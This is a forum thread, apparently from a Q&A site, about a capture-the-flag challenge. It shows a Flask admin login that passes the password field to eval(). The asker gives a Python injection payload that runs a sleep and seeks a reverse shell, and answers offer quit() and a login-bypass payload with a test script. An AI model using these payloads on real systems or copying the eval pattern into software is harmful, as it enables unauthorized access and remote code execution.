So, as part of a challenge I found the following piece of code on a template of an opensource site:

@app.route("/admin", methods=['GET', 'POST'])
def admin():
    username = getUsernameFromSecureStorage() or "admin"
    passwd = getPasswordFromSecureStorage()
    if session.get('loggedin', False):
        return render_template('admin_page.html')
    else:
        if request.method == 'POST':
            if eval("'"   request.form['pass']   "' == passwd"):
                session['loggedin'] = True
                return redirect(request.headers['referer'], code=302)
            else:
                return render_template('admin.html', msg="Login failed")
        return render_template('admin.html', msg="Welcome to the admin page")

I know for a fact that there is a python command injection here, as I was able to execute a sleep function using the following payload in the password field:

' eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single')) '

But in case of trying to bypass the login or getting a reverse shell, there has been no luck yet.

Grateful for any suggestions.

CodePudding user response：

Normaly quit function is quiting your app so quit function might be helpfull.

You can try:

quit()

CodePudding user response：

Maybe take a look here. It's a pretty neat cheat sheet for Reverse Shells, and there are plenty of python examples.

I'm sure you can find anything in there!

EDIT:
I dont have a working reverse shell yet, but bypassing login should be possible with "' == '' or '" as password.

example.py:

passwd = "aa"
evil_code = "' == '' or '"
if eval("'"   evil_code   "' == passwd"):
    print("success")
else:
    print("no success")